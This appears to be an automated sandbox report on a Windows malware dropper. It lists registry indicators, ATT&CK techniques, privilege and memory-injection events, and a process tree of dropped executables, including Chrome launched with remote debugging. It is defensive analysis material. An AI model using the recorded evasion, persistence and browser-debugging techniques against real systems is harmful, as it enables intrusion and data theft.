Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex12112.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2d2d358d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d7cec70240.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	con12312211221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d8d9d722e7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6ff8aa0de2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	d2d2d358d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8b0a647b34.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f4850135f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	d2d2d358d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d9b3cb7467.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aca90f55db.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sQ3DZPU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apisysDirectx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5ea96f5877.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f2af1d7928.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	con12312211221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e189d890b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex12112.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	06fe742185.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5412289161.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e954955770.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apisysDirectx.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	e189d890b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	e189d890b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	d8d9d722e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	d8d9d722e7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	86	Go-http-client/1.1

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
1184	taskkill.exe
1348	taskkill.exe
3148	taskkill.exe
1676	taskkill.exe
736	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133845340813422238"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2464	schtasks.exe
640	schtasks.exe
1976	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4244	apisysDirectx.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2148	skotes.exe
2148	skotes.exe
2564	8b0a647b34.exe
2564	8b0a647b34.exe
2464	e189d890b8.exe
2464	e189d890b8.exe
2464	e189d890b8.exe
2464	e189d890b8.exe
4992	f2af1d7928.exe
4992	f2af1d7928.exe
4992	f2af1d7928.exe
4992	f2af1d7928.exe
4992	f2af1d7928.exe
4992	f2af1d7928.exe
2256	DTQCxXZ.exe
2256	DTQCxXZ.exe
2256	DTQCxXZ.exe
2256	DTQCxXZ.exe
8	con12312211221.exe
8	con12312211221.exe
8	con12312211221.exe
8	con12312211221.exe
1876	monthdragon.exe
1876	monthdragon.exe
1876	monthdragon.exe
1876	monthdragon.exe
3300	Bjkm5hE.exe
3300	Bjkm5hE.exe
3300	Bjkm5hE.exe
3300	Bjkm5hE.exe
4652	f3Ypd8O.exe
4652	f3Ypd8O.exe
4652	f3Ypd8O.exe
4652	f3Ypd8O.exe
2516	alex12112.exe
2516	alex12112.exe
2516	alex12112.exe
2516	alex12112.exe
540	MAl7pjE.exe
540	MAl7pjE.exe
1304	fher.exe
1304	fher.exe
1304	fher.exe
1304	fher.exe
540	MAl7pjE.exe
540	MAl7pjE.exe
540	MAl7pjE.exe
540	MAl7pjE.exe
4952	7aencsM.exe
4952	7aencsM.exe
724	d7cec70240.exe
724	d7cec70240.exe
4952	7aencsM.exe
4952	7aencsM.exe
724	d7cec70240.exe
724	d7cec70240.exe
724	d7cec70240.exe
724	d7cec70240.exe
556	chrome.exe
556	chrome.exe
1752	skotes.exe
1752	skotes.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
556	chrome.exe
556	chrome.exe
556	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	2564	8b0a647b34.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeShutdownPrivilege	556	chrome.exe
Token: SeCreatePagefilePrivilege	556	chrome.exe
Token: SeDebugPrivilege	4336	sQ3DZPU.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeDebugPrivilege	4244	apisysDirectx.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	3148	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	736	taskkill.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	1256	firefox.exe
Token: SeDebugPrivilege	1256	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
556	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
1128	5e3f33cac2.exe
4220	d2d2d358d6.exe
1128	5e3f33cac2.exe
1128	5e3f33cac2.exe
1256	firefox.exe
1256	firefox.exe

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
1128	5e3f33cac2.exe
4220	d2d2d358d6.exe
1128	5e3f33cac2.exe
1128	5e3f33cac2.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
4220	d2d2d358d6.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
1256	firefox.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe
4220	d2d2d358d6.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1256	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1508 wrote to memory of 2148	1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	85
PID 1508 wrote to memory of 2148	1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	85
PID 1508 wrote to memory of 2148	1508	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	85
PID 2148 wrote to memory of 2564	2148	skotes.exe	86
PID 2148 wrote to memory of 2564	2148	skotes.exe	86
PID 2148 wrote to memory of 2564	2148	skotes.exe	86
PID 2148 wrote to memory of 2464	2148	skotes.exe	88
PID 2148 wrote to memory of 2464	2148	skotes.exe	88
PID 2148 wrote to memory of 2464	2148	skotes.exe	88
PID 2148 wrote to memory of 4060	2148	skotes.exe	89
PID 2148 wrote to memory of 4060	2148	skotes.exe	89
PID 2148 wrote to memory of 4060	2148	skotes.exe	89
PID 4060 wrote to memory of 5100	4060	amnew.exe	90
PID 4060 wrote to memory of 5100	4060	amnew.exe	90
PID 4060 wrote to memory of 5100	4060	amnew.exe	90
PID 2148 wrote to memory of 4992	2148	skotes.exe	94
PID 2148 wrote to memory of 4992	2148	skotes.exe	94
PID 2148 wrote to memory of 4992	2148	skotes.exe	94
PID 2148 wrote to memory of 2256	2148	skotes.exe	96
PID 2148 wrote to memory of 2256	2148	skotes.exe	96
PID 2148 wrote to memory of 2256	2148	skotes.exe	96
PID 2148 wrote to memory of 412	2148	skotes.exe	98
PID 2148 wrote to memory of 412	2148	skotes.exe	98
PID 2148 wrote to memory of 412	2148	skotes.exe	98
PID 5100 wrote to memory of 724	5100	futors.exe	97
PID 5100 wrote to memory of 724	5100	futors.exe	97
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 412 wrote to memory of 4952	412	7aencsM.exe	99
PID 724 wrote to memory of 4396	724	trano1221.exe	101
PID 724 wrote to memory of 4396	724	trano1221.exe	101
PID 5100 wrote to memory of 316	5100	futors.exe	103
PID 5100 wrote to memory of 316	5100	futors.exe	103
PID 5100 wrote to memory of 316	5100	futors.exe	103
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 316 wrote to memory of 8	316	con12312211221.exe	104
PID 5100 wrote to memory of 5096	5100	futors.exe	108
PID 5100 wrote to memory of 5096	5100	futors.exe	108
PID 5100 wrote to memory of 5096	5100	futors.exe	108
PID 5096 wrote to memory of 3592	5096	monthdragon.exe	109
PID 5096 wrote to memory of 3592	5096	monthdragon.exe	109
PID 5096 wrote to memory of 3592	5096	monthdragon.exe	109
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110
PID 5096 wrote to memory of 1876	5096	monthdragon.exe	110

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
"C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Users\Admin\AppData\Local\Temp\1089273001\8b0a647b34.exe
    "C:\Users\Admin\AppData\Local\Temp\1089273001\8b0a647b34.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- - C:\Users\Admin\AppData\Local\Temp\1089274001\e189d890b8.exe
    "C:\Users\Admin\AppData\Local\Temp\1089274001\e189d890b8.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 1512
      4⤵
      Program crash
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:724
      - C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4396
    - - C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:316
      - C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:8
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 316 -s 828
        6⤵
        Program crash
        
        PID:1348
    - - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5096
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        
        PID:3592
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1876
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 976
        6⤵
        Program crash
        
        PID:4500
    - - C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
        5⤵
        Executes dropped EXE
        
        PID:3520
    - - C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2484
      - C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
        6⤵
        Executes dropped EXE
        
        PID:2976
      - C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
        6⤵
        Executes dropped EXE
        
        PID:4124
      - C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2516
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 968
        6⤵
        Program crash
        
        PID:4180
    - - C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4352
      - C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
        6⤵
        Executes dropped EXE
        
        PID:3796
      - C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1304
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 788
        6⤵
        Program crash
        
        PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\10009640101\d8d9d722e7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10009640101\d8d9d722e7.exe"
        5⤵
        Enumerates VirtualBox registry keys
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:912
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff80a42cc40,0x7ff80a42cc4c,0x7ff80a42cc58
        7⤵
        
        PID:4368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2408,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2400 /prefetch:2
        7⤵
        
        PID:5020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1904,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:3
        7⤵
        
        PID:4948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
